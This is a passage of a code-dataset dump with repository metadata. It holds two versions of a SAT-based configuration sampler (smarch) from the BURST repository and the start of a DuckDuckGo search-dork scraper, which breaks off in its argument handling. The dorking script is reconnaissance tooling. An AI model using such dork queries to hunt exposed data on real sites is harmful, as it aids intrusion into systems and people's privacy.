- means negation\"\"\"\r\n\r\n _const = list()\r\n\r\n if os.path.exists(constfile_):\r\n names = [i[1] for i in features_]\r\n with open(constfile_) as file:\r\n for line in file:\r\n line = line.rstrip()\r\n data = line.split()\r\n if len(data) != 0:\r\n clause = list()\r\n\r\n error = False\r\n for name in data:\r\n prefix = 1\r\n if name.startswith('-'):\r\n name = name[1:len(name)]\r\n prefix = -1\r\n\r\n if name in names:\r\n i = names.index(name)\r\n clause.append(features_[i][0] * prefix)\r\n else:\r\n error = True\r\n clause.append(name)\r\n\r\n if not error:\r\n _const.append(clause)\r\n print(\"Added constraint: \" + line + \" \" + str(clause))\r\n else:\r\n print(\"Feature not found\" + str(clause))\r\n\r\n # line = line[0:len(line) - 1]\r\n # prefix = ''\r\n # if line.startswith('!'):\r\n # line = line[1:len(line)]\r\n # prefix = '-'\r\n #\r\n # # filter features that does not exist\r\n # if line in names:\r\n # i = names.index(line)\r\n # _const.append(prefix + features_[i][0])\r\n # print(\"Added constraint: \" + prefix + features_[i][0] + \",\" + prefix + features_[i][1])\r\n else:\r\n print(\"Constraint file not found\")\r\n\r\n return _const\r\n\r\n\r\ndef get_var(flist, features_):\r\n \"\"\"convert feature names into variables\"\"\"\r\n\r\n _const = list()\r\n names = [i[1] for i in features_]\r\n\r\n for feature in flist:\r\n #feature = feature[0:len(feature) - 1]\r\n prefix = 1\r\n if feature.startswith('-'):\r\n feature = feature[1:len(feature)]\r\n prefix = -1\r\n\r\n # filter features that does not exist\r\n if feature in names:\r\n i = names.index(feature)\r\n _const.append(prefix * features_[i][0])\r\n\r\n return _const\r\n\r\n\r\ndef gen_dimacs(vars_, clauses_, constraints_, outfile_):\r\n \"\"\"generate a dimacs file from given clauses and constraints\"\"\"\r\n\r\n f = open(outfile_, 'w')\r\n f.write('p cnf ' + vars_ + ' ' + str(len(clauses_) + len(constraints_)) + '\\n')\r\n\r\n for cl in clauses_:\r\n #f.write(cl + '\\n')\r\n f.write(\" \".join(str(x) for x in cl) + ' 0 \\n')\r\n\r\n for ct in constraints_:\r\n if isinstance(ct, (list,)):\r\n line = \"\"\r\n for v in ct:\r\n line = line + str(v) + \" \"\r\n f.write(line + '0 \\n')\r\n else:\r\n f.write(str(ct) + ' 0 \\n')\r\n\r\n f.close()\r\n\r\n\r\ndef count(dimacs_, constraints_):\r\n \"\"\"count dimacs solutions with given constraints\"\"\"\r\n\r\n _tempdimacs = os.path.dirname(dimacs_) + '/count.dimacs'\r\n _features, _clauses, _vcount = read_dimacs(dimacs_)\r\n\r\n gen_dimacs(_vcount, _clauses, constraints_, _tempdimacs)\r\n res = int(getoutput(SHARPSAT + ' -q ' + _tempdimacs))\r\n\r\n return res\r\n\r\n\r\ndef checkSAT(dimacs_, constraints_):\r\n \"\"\"check satisfiability of given formula with constraints\"\"\"\r\n _features, _clauses, _vcount = read_dimacs(dimacs_)\r\n cnf = _clauses + constraints_\r\n s = pycosat.solve(cnf)\r\n\r\n if s == 'UNSAT':\r\n return False\r\n else:\r\n return True\r\n\r\n\r\ndef sample(vcount_, clauses_, n_, wdir_, const_=(), cache_=False, quiet_=False, samplefile_=\"\"):\r\n \"\"\"sample configurations\"\"\"\r\n\r\n if not os.path.exists(wdir_):\r\n os.makedirs(wdir_)\r\n\r\n samples = list()\r\n\r\n # partition space by cubes and count number of solutions for each cube\r\n def partition(assigned_, current_, tree_):\r\n _total = 0\r\n _counts = list()\r\n _cubes = list()\r\n _freevar = list()\r\n _dimacsfile = wdir_ + '/dimacs.smarch'\r\n _cubefile = wdir_ + '/cubes.smarch'\r\n\r\n # create dimacs file regarding constraints\r\n gen_dimacs(vcount_, clauses_, assigned_, 
_dimacsfile)\r\n\r\n # execute march to get cubes\r\n res = getoutput(MARCH + ' ' + _dimacsfile + ' -d 5 -# -o ' + _cubefile)\r\n out = res.split(\"\\n\")\r\n\r\n # print march result (debugging purpose)\r\n #print(out)\r\n\r\n if out[7].startswith('c all'):\r\n _freevar = out[5].split(\": \")[1].split()\r\n\r\n with open(_cubefile) as f:\r\n for _line in f:\r\n _cube = list(_line.split())\r\n if 'a' in _cube:\r\n _cube.remove('a')\r\n if '0' in _cube:\r\n _cube.remove('0')\r\n\r\n _cubes.append(_cube)\r\n\r\n # execute sharpSAT to count solutions\r\n for _cube in _cubes:\r\n gen_dimacs(vcount_, clauses_, assigned_ + _cube, _dimacsfile)\r\n res = int(getoutput(SHARPSAT + ' -q ' + _dimacsfile))\r\n # print(res)\r\n _total += res\r\n _counts.append(res)\r\n\r\n # double check if all variables are free (nonempty freevar means all free)\r\n if _total != pow(2, len(_freevar)):\r\n _freevar.clear()\r\n\r\n # set total number of solutions\r\n current_.count = _total\r\n\r\n if tree_:\r\n # extend tree - do not extend if all variables are free\r\n if len(_freevar) == 0:\r\n for _i in range(0, len(_counts)):\r\n _node = AnyNode(parent=current_, count=_counts[_i], cube=_cubes[_i])\r\n\r\n return [_freevar, _counts, _cubes, _total]\r\n\r\n # generate n random numbers for sampling\r\n def get_random(rcount_, total_):\r\n def gen_random():\r\n while True:\r\n yield random.randrange(1, total_, 1)\r\n\r\n def gen_n_unique(source, n__):\r\n seen = set()\r\n seenadd = seen.add\r\n for i in (i for i in source() if i not in seen and not seenadd(i)):\r\n yield i\r\n if len(seen) == n__:\r\n break\r\n\r\n return [i for i in gen_n_unique(gen_random, min(rcount_, int(total_ - 1)))]\r\n\r\n # select a cube based on given random number\r\n def select_cube(counts_, cubes_, number_):\r\n _terminate = False\r\n _index = -1\r\n _i = 0\r\n\r\n for c in counts_:\r\n if number_ <= c:\r\n _index = _i\r\n if c == 1:\r\n _terminate = True\r\n break\r\n else:\r\n number_ -= c\r\n _i += 1\r\n\r\n return cubes_[_index], number_, _terminate\r\n\r\n # traverse the cube tree based on given random number (requires cache_=True)\r\n def traverse_cube(current_, number_):\r\n _assigned = list()\r\n _terminate = False\r\n #_assigned = _assigned + _current.cube\r\n\r\n while len(current_.children) != 0 or current_.count != 1:\r\n for node in current_.children:\r\n if number_ <= node.count:\r\n _assigned = _assigned + node.cube\r\n current_ = node\r\n break\r\n else:\r\n number_ -= node.count\r\n break\r\n\r\n if current_.count == 1:\r\n _terminate = True\r\n\r\n return _assigned, number_, _terminate, current_\r\n\r\n # assign free variables without recursion\r\n def set_freevar(freevar_, number_):\r\n _vars = list()\r\n\r\n for v in freevar_:\r\n if number_ % 2 == 1:\r\n _vars.append(v)\r\n else:\r\n _vars.append('-'+v)\r\n number_ //= 2\r\n\r\n return _vars\r\n\r\n clauses_ = clauses_ + const_\r\n\r\n root = AnyNode(count=-1, cube=[])\r\n if not quiet_:\r\n print(\"Counting - \", end='')\r\n freevar = partition([], root, cache_)\r\n\r\n if not quiet_:\r\n print(\"Total configurations: \" + str(freevar[3]))\r\n\r\n start_time = time.time()\r\n\r\n # generate random numbers\r\n rands = get_random(n_, freevar[3])\r\n\r\n if samplefile_ != \"\":\r\n f = open(samplefile_, \"w\")\r\n else:\r\n f = \"\"\r\n\r\n i = 0\r\n\r\n # sample for each random number\r\n for r in rands:\r\n if not quiet_:\r\n print(\"Sampling \" + str(i) + \" with \" + str(r) + \" - \", end='')\r\n sample_time = time.time()\r\n\r\n # initialize variables\r\n number = 
r\r\n assigned = list()\r\n current = root\r\n\r\n if len(freevar[0]) != 0: # all variables free, sampling done\r\n assigned = assigned + set_freevar(freevar[0], int(number))\r\n #print(\"all free\")\r\n terminate = True\r\n else: # select cube to recurse\r\n if cache_:\r\n cube, number, terminate, current = traverse_cube(current, number)\r\n else:\r\n cube, number, terminate = select_cube(freevar[1], freevar[2], number)\r\n assigned = assigned + cube\r\n\r\n if len(cube) == 0:\r\n print(\"ERROR: cube not selected\")\r\n exit()\r\n\r\n # recurse\r\n while not terminate:\r\n r_freevar = partition(assigned, current, cache_)\r\n\r\n if len(r_freevar[0]) != 0: # all variables free, sampling done\r\n assigned = assigned + set_freevar(r_freevar[0], int(number))\r\n #print(\"all free\")\r\n terminate = True\r\n else: # select cube to recurse\r\n if cache_:\r\n cube, number, terminate, current = traverse_cube(current, number)\r\n else:\r\n cube, number, terminate = select_cube(r_freevar[1], r_freevar[2], number)\r\n assigned = assigned + cube\r\n\r\n if len(cube) == 0:\r\n print(\"ERROR: cube not selected\")\r\n exit()\r\n\r\n # verify if sample is valid and assign dead variables using pycosat\r\n assigned = list(map(int, assigned))\r\n aclause = [assigned[i:i+1] for i in range(0, len(assigned))]\r\n cnf = clauses_ + aclause\r\n s = pycosat.solve(cnf)\r\n\r\n # print(s)\r\n\r\n # sdimacs = sdir + \"/\" + str(i) + \".dimacs\"\r\n # gen_dimacs(vcount_, clauses_, assigned, sdimacs)\r\n # getoutput(\"minisat \" + sdimacs + \" \" + sdir + \"/\" + str(i) + \".sol\")\r\n # res = int(getoutput(SHARPSAT + ' -q ' + sdimacs))\r\n # print(res)\r\n\r\n # print(len(s))\r\n\r\n if s == 'UNSAT':\r\n print(\"ERROR: Sample Invalid\")\r\n exit(1)\r\n else:\r\n if samplefile_ == \"\":\r\n samples.append(set(s))\r\n else:\r\n for v in s:\r\n f.write(str(v))\r\n f.write(\",\")\r\n f.write(\"\\n\")\r\n\r\n if not quiet_:\r\n print(\"sampling time: \" + str(time.time() - sample_time))\r\n\r\n i += 1\r\n\r\n if not quiet_:\r\n print(\"--- total time: %s seconds ---\" % (time.time() - start_time))\r\n\r\n if cache_:\r\n exporter = JsonExporter()\r\n with open(wdir_ + \"/tree.json\", 'w') as file:\r\n file.write(exporter.export(root))\r\n file.close()\r\n else:\r\n shutil.rmtree(wdir_)\r\n\r\n if samplefile_ != \"\":\r\n f.close()\r\n\r\n return samples\r\n\r\n\r\n# test script\r\n# n = 10\r\n# target = \"axtls_2_1_4\"\r\n#\r\n# dimacs = \"/home/jeho/kmax/kconfig_case_studies/cases/\" + target + \"/build/kconfig.dimacs\"\r\n# constfile = os.path.dirname(dimacs) + \"/constraints.txt\"\r\n# wdir = os.path.dirname(dimacs) + \"/smarch\"\r\n#\r\n# features, clauses, vcount = read_dimacs(dimacs)\r\n# const = read_constraints(constfile, features)\r\n#\r\n# samples = sample(vcount, clauses, n, wdir, const, True, 1)\r\n\r\n\r\n# run script\r\nif __name__ == \"__main__\":\r\n # get external location for sharpSAT and march if needed\r\n if os.path.exists(srcdir + \"/links.txt\"):\r\n with open(srcdir + \"/links.txt\") as f:\r\n for _line in f:\r\n link = list(_line.split('='))\r\n if len(link) != 0 and link[0][0] != '#':\r\n if link[0] == \"SHARPSAT\":\r\n SHARPSAT = link[1]\r\n elif link[0] == \"MARCH\":\r\n MARCH = link[1]\r\n\r\n # check sharpSAT and march_cu existence\r\n if not os.path.exists(SHARPSAT):\r\n print(\"ERROR: sharpSAT not found\")\r\n\r\n if not os.path.exists(MARCH):\r\n print(\"ERROR: March solver not found\")\r\n\r\n # get parameters from console\r\n try:\r\n opts, args = getopt.getopt(sys.argv[1:], \"hc:o:q\", 
['help', \"cfile=\", \"odir=\", 'quiet'])\r\n except getopt.GetoptError:\r\n print('smarch.py -c <constfile> -o <outputdir> -q| <dimacsfile> <samplecount>')\r\n sys.exit(2)\r\n\r\n if len(args) < 2:\r\n print('smarch.py -c <constfile> -o <outputdir> -q | <dimacsfile> <samplecount>')\r\n sys.exit(2)\r\n\r\n dimacs = args[0]\r\n base = os.path.basename(dimacs)\r\n target = os.path.splitext(base)[0]\r\n\r\n n = int(args[1])\r\n\r\n print('Input file: ', dimacs)\r\n print('Number of samples: ', n)\r\n\r\n wdir = os.path.dirname(dimacs) + \"/smarch\"\r\n constfile = ''\r\n samplefile = \"\"\r\n quiet = False\r\n cache = False\r\n out = False\r\n\r\n for opt, arg in opts:\r\n if opt == '-h':\r\n print('smarch.py -c <constfile> -o <outputdir> -s | <dimacsfile> <samplecount>')\r\n sys.exit()\r\n elif opt in (\"-c\", \"--cfile\"):\r\n constfile = arg\r\n print(\"Consraint file: \" + constfile)\r\n elif opt in (\"-o\", \"--odir\"):\r\n odir = arg\r\n wdir = odir + \"/smarch\"\r\n samplefile = odir + \"/\" + target + \"_\" + str(n) + \".samples\"\r\n out = True\r\n print(\"Output directory: \" + wdir)\r\n elif opt in (\"-l\", \"--log\"):\r\n start = int(arg)\r\n cache = True\r\n elif opt in (\"-q\", \"--quiet\"):\r\n quiet = True\r\n else:\r\n print(\"Invalid option: \" + opt)\r\n\r\n features, clauses, vcount = read_dimacs(dimacs)\r\n const = list()\r\n if constfile != '':\r\n read_constraints(constfile, features)\r\n\r\n samples = sample(vcount, clauses, n, wdir, const, cache, quiet, samplefile)\r\n\r\n if out:\r\n # f = open(wdir + \"/\" + target + \"_\" + str(n) + \".samples\", 'w')\r\n # for s in samples:\r\n # for v in s:\r\n # f.write(str(v))\r\n # f.write(\",\")\r\n # f.write(\"\\n\")\r\n # f.close()\r\n\r\n print('Output samples created on: ', samplefile)\r\n" }, { "alpha_fraction": 0.4861926734447479, "alphanum_fraction": 0.49269023537635803, "avg_line_length": 29.3150691986084, "blob_id": "c05d109558893265bbb6d1aa621e5dda15685c60", "content_id": "4fbecf87bba42b8e56edcff7ad1f1ee382a6f3b1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16006, "license_type": "permissive", "max_line_length": 153, "num_lines": 511, "path": "/samplers/smarch_mp.py", "repo_name": "diverse-project/BURST", "src_encoding": "UTF-8", "text": "\"\"\"\r\nSmarch - random sampling of propositional formula solutions\r\nVersion - 0.1\r\n\"\"\"\r\n\r\n\r\nimport random\r\nfrom subprocess import getoutput\r\nimport pycosat\r\nimport os\r\nimport shutil\r\nimport time\r\nimport sys\r\nimport getopt\r\n\r\nimport multiprocessing\r\n\r\n\r\nsrcdir = os.path.dirname(os.path.abspath(__file__))\r\nSHARPSAT = srcdir + '/sharpSATSMARCH/Release/sharpSAT'\r\nMARCH = srcdir + '/march_cu/march_cu'\r\n\r\n\r\ndef read_dimacs(dimacsfile_):\r\n \"\"\"parse variables and clauses from a dimacs file\"\"\"\r\n\r\n _features = list()\r\n _clauses = list()\r\n _vcount = '-1' # required for variables without names\r\n\r\n with open(dimacsfile_) as f:\r\n for line in f:\r\n # read variables in comments\r\n if line.startswith(\"c ind\"): #we do not deal with independant variables produced by other tool - modification w.r.t original SMARCH MP \r\n continue \r\n elif line.startswith(\"c\"):\r\n line = line[0:len(line) - 1]\r\n _feature = line.split(\" \", 4)\r\n del _feature[0]\r\n # handling non-numeric feature IDs - modification w.r.t original SMARCH MP, necessary to parse os-like models with $ in feature names...\r\n if len(_feature) <= 2 and len(_feature) > 0: # needs to deal with 
literate comments, e.g., in V15 models\r\n \r\n if (_feature[0].isdigit()):\r\n _feature[0] = int(_feature[0])\r\n else:\r\n # num_filter = filter(_feature[0].isdigit(), _feature[0])\r\n num_feature = \"\".join(c for c in _feature[0] if c.isdigit())\r\n _feature[0] = int(num_feature)\r\n _features.append(tuple(_feature))\r\n # read dimacs properties\r\n elif line.startswith(\"p\"):\r\n info = line.split()\r\n _vcount = info[2]\r\n # read clauses\r\n else:\r\n info = line.split()\r\n if len(info) != 0:\r\n _clauses.append(list(map(int, info[:len(info)-1])))\r\n \r\n return _features, _clauses, _vcount\r\n\r\n\r\ndef read_constraints(constfile_, features_):\r\n \"\"\"read constraint file. - means negation\"\"\"\r\n\r\n _const = list()\r\n\r\n if os.path.exists(constfile_):\r\n names = [i[1] for i in features_]\r\n with open(constfile_) as file:\r\n for line in file:\r\n line = line.rstrip()\r\n data = line.split()\r\n if len(data) != 0:\r\n clause = list()\r\n\r\n error = False\r\n for name in data:\r\n prefix = 1\r\n if name.startswith('-'):\r\n name = name[1:len(name)]\r\n prefix = -1\r\n\r\n if name in names:\r\n i = names.index(name)\r\n clause.append(features_[i][0] * prefix)\r\n else:\r\n error = True\r\n clause.append(name)\r\n\r\n if not error:\r\n _const.append(clause)\r\n print(\"Added constraint: \" + line + \" \" + str(clause))\r\n else:\r\n print(\"Feature not found\" + str(clause))\r\n\r\n # line = line[0:len(line) - 1]\r\n # prefix = ''\r\n # if line.startswith('!'):\r\n # line = line[1:len(line)]\r\n # prefix = '-'\r\n #\r\n # # filter features that does not exist\r\n # if line in names:\r\n # i = names.index(line)\r\n # _const.append(prefix + features_[i][0])\r\n # print(\"Added constraint: \" + prefix + features_[i][0] + \",\" + prefix + features_[i][1])\r\n else:\r\n print(\"Constraint file not found\")\r\n\r\n return _const\r\n\r\n\r\ndef get_var(flist, features_):\r\n \"\"\"convert feature names into variables\"\"\"\r\n\r\n _const = list()\r\n names = [i[1] for i in features_]\r\n\r\n for feature in flist:\r\n prefix = 1\r\n if feature.startswith('-'):\r\n feature = feature[1:len(feature)]\r\n prefix = -1\r\n\r\n # filter features that does not exist\r\n if feature in names:\r\n i = names.index(feature)\r\n _const.append(prefix * features_[i][0])\r\n\r\n return _const\r\n\r\n\r\ndef gen_dimacs(vars_, clauses_, constraints_, outfile_):\r\n \"\"\"generate a dimacs file from given clauses and constraints\"\"\"\r\n\r\n f = open(outfile_, 'w')\r\n f.write('p cnf ' + vars_ + ' ' + str(len(clauses_) + len(constraints_)) + '\\n')\r\n\r\n for cl in clauses_:\r\n f.write(\" \".join(str(x) for x in cl) + ' 0 \\n')\r\n\r\n for ct in constraints_:\r\n if isinstance(ct, (list,)):\r\n line = \"\"\r\n for v in ct:\r\n line = line + str(v) + \" \"\r\n f.write(line + '0 \\n')\r\n else:\r\n f.write(str(ct) + ' 0 \\n')\r\n\r\n f.close()\r\n\r\n\r\ndef count(dimacs_, constraints_):\r\n \"\"\"count dimacs solutions with given constraints\"\"\"\r\n\r\n _tempdimacs = os.path.dirname(dimacs_) + '/count.dimacs'\r\n _features, _clauses, _vcount = read_dimacs(dimacs_)\r\n\r\n gen_dimacs(_vcount, _clauses, constraints_, _tempdimacs)\r\n res = int(getoutput(SHARPSAT + ' -q ' + _tempdimacs))\r\n\r\n return res\r\n\r\n\r\ndef checkSAT(dimacs_, constraints_):\r\n \"\"\"check satisfiability of given formula with constraints\"\"\"\r\n _features, _clauses, _vcount = read_dimacs(dimacs_)\r\n cnf = _clauses + constraints_\r\n s = pycosat.solve(cnf)\r\n\r\n if s == 'UNSAT':\r\n return False\r\n else:\r\n 
return True\r\n\r\n\r\n# partition space by cubes and count number of solutions for each cube\r\ndef partition(assigned_, vcount_, clauses_, wdir_):\r\n _total = 0\r\n _counts = list()\r\n _cubes = list()\r\n _freevar = list()\r\n _dimacsfile = wdir_ + '/dimacs.smarch'\r\n _cubefile = wdir_ + '/cubes.smarch'\r\n\r\n # create dimacs file regarding constraints\r\n gen_dimacs(vcount_, clauses_, assigned_, _dimacsfile)\r\n\r\n # execute march to get cubes\r\n res = getoutput(MARCH + ' ' + _dimacsfile + ' -d 5 -# -o ' + _cubefile)\r\n out = res.split(\"\\n\")\r\n\r\n # print march result (debugging purpose)\r\n #print(out)\r\n\r\n if out[7].startswith('c all'):\r\n _freevar = out[5].split(\": \")[1].split()\r\n\r\n with open(_cubefile) as f:\r\n for _line in f:\r\n _cube = list(_line.split())\r\n if 'a' in _cube:\r\n _cube.remove('a')\r\n if '0' in _cube:\r\n _cube.remove('0')\r\n\r\n _cubes.append(_cube)\r\n\r\n # execute sharpSAT to count solutions\r\n for _cube in _cubes:\r\n gen_dimacs(vcount_, clauses_, assigned_ + _cube, _dimacsfile)\r\n res = int(getoutput(SHARPSAT + ' -q ' + _dimacsfile))\r\n # print(res)\r\n _total += res\r\n _counts.append(res)\r\n\r\n # double check if all variables are free (nonempty freevar means all free)\r\n if _total != pow(2, len(_freevar)):\r\n _freevar.clear()\r\n\r\n return [_freevar, _counts, _cubes, _total]\r\n\r\n\r\ndef master(vcount_, clauses_, n_, wdir_, const_=(), threads_=3, quiet_=False):\r\n \"\"\"generate random numbers and manage sampling processes\"\"\"\r\n\r\n # generate n random numbers for sampling\r\n def get_random(rcount_, total_):\r\n def gen_random():\r\n while True:\r\n yield random.randrange(1, total_, 1)\r\n\r\n def gen_n_unique(source, n__):\r\n seen = set()\r\n seenadd = seen.add\r\n for i in (i for i in source() if i not in seen and not seenadd(i)):\r\n yield i\r\n if len(seen) == n__:\r\n break\r\n\r\n return [i for i in gen_n_unique(gen_random, min(rcount_, int(total_ - 1)))]\r\n\r\n clauses_ = clauses_ + const_\r\n\r\n if not quiet_:\r\n print(\"Counting - \", end='')\r\n freevar = partition([], vcount_, clauses_, wdir_)\r\n\r\n if not quiet_:\r\n print(\"Total configurations: \" + str(freevar[3]))\r\n\r\n # generate random numbers\r\n rands = get_random(n_, freevar[3])\r\n\r\n # partition random numbers for each thread\r\n if threads_ > n_:\r\n threads_ = n_\r\n\r\n chunk = int(n / threads_)\r\n rlist = list()\r\n\r\n for i in range(0, threads_):\r\n rlist.append(list())\r\n\r\n i = 0\r\n for r in rands:\r\n rev = i % threads_\r\n rlist[rev].append(r)\r\n i += 1\r\n\r\n # run sampling processes\r\n samples = list()\r\n with multiprocessing.Manager() as manager:\r\n q = manager.Queue()\r\n plist = list()\r\n\r\n # create processes\r\n for i in range(0, threads_):\r\n plist.append(multiprocessing.Process(target=sample,\r\n args=(q, vcount_, clauses, rlist[i], wdir_, freevar,\r\n quiet_,)))\r\n\r\n # start processes\r\n for p in plist:\r\n p.start()\r\n\r\n # wait until processes are finished\r\n for p in plist:\r\n p.join()\r\n\r\n # gather samples\r\n while not q.empty():\r\n samples.append(q.get())\r\n # sset = q.get()\r\n # for s in sset:\r\n # samples.append(s)\r\n\r\n return samples\r\n\r\n\r\ndef sample(q, vcount_, clauses_, rands_, wdir_, freevar_, quiet_=False):\r\n \"\"\"sample configurations\"\"\"\r\n # create folder for file IO of this process\r\n pid = os.getpid()\r\n _wdir = wdir_ + \"/\" + str(pid)\r\n if not os.path.exists(_wdir):\r\n os.makedirs(_wdir)\r\n\r\n # select a cube based on given random number\r\n def 
select_cube(counts_, cubes_, number_):\r\n _terminate = False\r\n _index = -1\r\n _i = 0\r\n\r\n for c in counts_:\r\n if number_ <= c:\r\n _index = _i\r\n if c == 1:\r\n _terminate = True\r\n break\r\n else:\r\n number_ -= c\r\n _i += 1\r\n\r\n return cubes_[_index], number_, _terminate\r\n\r\n # assign free variables without recursion\r\n def set_freevar(fv_, number_):\r\n _vars = list()\r\n\r\n for v in fv_:\r\n if number_ % 2 == 1:\r\n _vars.append(v)\r\n else:\r\n _vars.append('-'+v)\r\n number_ //= 2\r\n\r\n return _vars\r\n\r\n # sample for each random number\r\n i = 0\r\n _sample = list()\r\n for r in rands_:\r\n if not quiet_:\r\n print(str(pid) + \": Sampling \" + str(i) + \" with \" + str(r) + \" - \", end='')\r\n sample_time = time.time()\r\n\r\n # initialize variables\r\n number = r\r\n assigned = list()\r\n\r\n if len(freevar_[0]) != 0: # all variables free, sampling done\r\n assigned = assigned + set_freevar(freevar_[0], int(number))\r\n terminate = True\r\n else: # select cube to recurse\r\n cube, number, terminate = select_cube(freevar_[1], freevar_[2], number)\r\n assigned = assigned + cube\r\n\r\n if len(cube) == 0:\r\n print(\"ERROR: cube not selected\")\r\n exit()\r\n\r\n # recurse\r\n while not terminate:\r\n r_freevar = partition(assigned, vcount_, clauses_, _wdir)\r\n\r\n if len(r_freevar[0]) != 0: # all variables free, sampling done\r\n assigned = assigned + set_freevar(r_freevar[0], int(number))\r\n terminate = True\r\n else: # select cube to recurse\r\n cube, number, terminate = select_cube(r_freevar[1], r_freevar[2], number)\r\n assigned = assigned + cube\r\n\r\n if len(cube) == 0:\r\n print(\"ERROR: cube not selected\")\r\n exit()\r\n\r\n # verify if sample is valid and assign dead variables using pycosat\r\n assigned = list(map(int, assigned))\r\n aclause = [assigned[i:i+1] for i in range(0, len(assigned))]\r\n cnf = clauses_ + aclause\r\n s = pycosat.solve(cnf)\r\n\r\n\r\n # print(s)\r\n\r\n if s == 'UNSAT':\r\n print(\"ERROR: Sample Invalid\")\r\n exit(1)\r\n else:\r\n # _sample.append(s)\r\n q.put(s)\r\n\r\n if not quiet_:\r\n print(\"sampling time: \" + str(time.time() - sample_time))\r\n i += 1\r\n\r\n # q.put(_sample)\r\n shutil.rmtree(_wdir)\r\n\r\n return\r\n\r\n\r\n# test script\r\n# n = 10\r\n# target = \"axtls_2_1_4\"\r\n#\r\n# dimacs = \"/home/jeho/kmax/kconfig_case_studies/cases/\" + target + \"/build/kconfig.dimacs\"\r\n# constfile = os.path.dirname(dimacs) + \"/constraints.txt\"\r\n# wdir = os.path.dirname(dimacs) + \"/smarch\"\r\n#\r\n# features, clauses, vcount = read_dimacs(dimacs)\r\n# const = read_constraints(constfile, features)\r\n#\r\n# samples = sample(vcount, clauses, n, wdir, const, True, 1)\r\n\r\n\r\n# run script\r\nif __name__ == \"__main__\":\r\n # get external location for sharpSAT and march if needed\r\n if os.path.exists(srcdir + \"/links.txt\"):\r\n with open(srcdir + \"/links.txt\") as f:\r\n for _line in f:\r\n link = list(_line.split('='))\r\n if len(link) != 0 and link[0][0] != '#':\r\n if link[0] == \"SHARPSAT\":\r\n SHARPSAT = link[1]\r\n elif link[0] == \"MARCH\":\r\n MARCH = link[1]\r\n\r\n # check sharpSAT and march_cu existence\r\n if not os.path.exists(SHARPSAT):\r\n print(\"ERROR: sharpSAT not found\")\r\n\r\n if not os.path.exists(MARCH):\r\n print(\"ERROR: March solver not found\")\r\n\r\n # get parameters from console\r\n try:\r\n opts, args = getopt.getopt(sys.argv[1:], \"hc:o:p:q\", ['help', \"cfile=\", \"odir=\", \"threads=\", 'quiet'])\r\n except getopt.GetoptError:\r\n print('smarch.py -c <constfile> -o 
<outputdir> -p <threads> -q -t | <dimacsfile> <samplecount>')\r\n sys.exit(2)\r\n\r\n if len(args) < 2:\r\n print('smarch.py -c <constfile> -o <outputdir> -p <threads> -q -t | <dimacsfile> <samplecount>')\r\n sys.exit(2)\r\n\r\n dimacs = args[0]\r\n n = int(args[1])\r\n\r\n print('Input file: ', dimacs)\r\n print('Number of samples: ', n)\r\n\r\n wdir = os.path.dirname(dimacs) + \"/smarch\"\r\n constfile = ''\r\n quiet = False\r\n out = False\r\n threads = 1\r\n timeout_sec = None\r\n\r\n # process parameters\r\n for opt, arg in opts:\r\n if opt == '-h':\r\n print('smarch.py -c <constfile> -o <outputdir> -p <threads> -q | <dimacsfile> <samplecount>')\r\n sys.exit()\r\n elif opt in (\"-c\", \"--cfile\"):\r\n constfile = arg\r\n print(\"Consraint file: \" + constfile)\r\n elif opt in (\"-o\", \"--odir\"):\r\n wdir = arg\r\n out = True\r\n if not os.path.exists(wdir):\r\n os.makedirs(wdir)\r\n print(\"Output directory: \" + wdir)\r\n elif opt in (\"-p\", \"--threads\"):\r\n threads = int(arg)\r\n elif opt in (\"-q\", \"--quiet\"):\r\n quiet = True\r\n else:\r\n print(\"Invalid option: \" + opt)\r\n\r\n # process dimacs file\r\n features, clauses, vcount = read_dimacs(dimacs)\r\n const = list()\r\n if constfile != '':\r\n read_constraints(constfile, features)\r\n\r\n # sample configurations\r\n start_time = time.time()\r\n samples = master(vcount, clauses, n, wdir, const, threads, quiet)\r\n if not quiet:\r\n print(\"--- total time: %s seconds ---\" % (time.time() - start_time))\r\n\r\n # output samples to a file\r\n base = os.path.basename(dimacs)\r\n target = os.path.splitext(base)[0]\r\n samplefile = wdir + \"/\" + target + \"_\" + str(n) + \".samples\"\r\n\r\n if out:\r\n f = open(wdir + \"/\" + target + \"_\" + str(n) + \".samples\", 'w')\r\n for s in samples:\r\n for v in s:\r\n f.write(str(v))\r\n f.write(\",\")\r\n f.write(\"\\n\")\r\n f.close()\r\n\r\n print('Output samples created on: ', samplefile)\r\n\r\n\r\n" } ]
8
edrapac/DuckDork
https://github.com/edrapac/DuckDork
2d70bcb773e5dd80a1b7be64a692ceea1ad10599
138d838700860b560c92792dbf20f4cdfbb627e7
13e04548542508983dbf2c38eedb04bf98628927
refs/heads/master
2023-07-17T08:12:46.350496
2021-09-06T15:20:25
2021-09-06T15:20:25
277,129,015
1
0
null
2020-07-04T14:47:26
2020-07-07T20:18:01
2020-07-13T18:41:29
Python
[ { "alpha_fraction": 0.6574368476867676, "alphanum_fraction": 0.6664172410964966, "avg_line_length": 42.173553466796875, "blob_id": "1ff62ce2a5c3488a0b48b12041f93cbddf449dfb", "content_id": "3f0e42a5004807b6a46320fdb134ae5a7c41eb91", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5345, "license_type": "no_license", "max_line_length": 164, "num_lines": 121, "path": "/dork_requests.py", "repo_name": "edrapac/DuckDork", "src_encoding": "UTF-8", "text": "import requests\r\nfrom bs4 import BeautifulSoup\r\nimport argparse\r\nimport sys\r\nfrom time import sleep \r\n\r\nheaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\"dork\",help='''pass a full dork as an argument, if you want exact searches ie you want the dork to use quotation marks, \r\npass the exact y. PLEASE NOTE THAT EXACT SEARCHES WITH A DORK OFTEN FAIL ie allintext:\"mark zuckerburg\" but exact searches ie \"mark zuckerberg\" do not\\n''',type=str)\r\nparser.add_argument(\"results\",help='number of pages of results you want back. Default is 1 page',const=0,nargs='?',type=int)\r\nparser.add_argument(\"exact\",help='usage of quotes for exact searching',const='n',nargs='?',type=str)\r\nargs = parser.parse_args()\r\nfirst_request = {}\r\nentry = {}\r\npostURL = 'https://html.duckduckgo.com/html/' #POSTS must go to this base url\r\n\r\n \r\ndef get(dork):\r\n\tif args.exact=='y':\r\n\t\tif ':' in args.dork:\r\n\t\t\tdork = 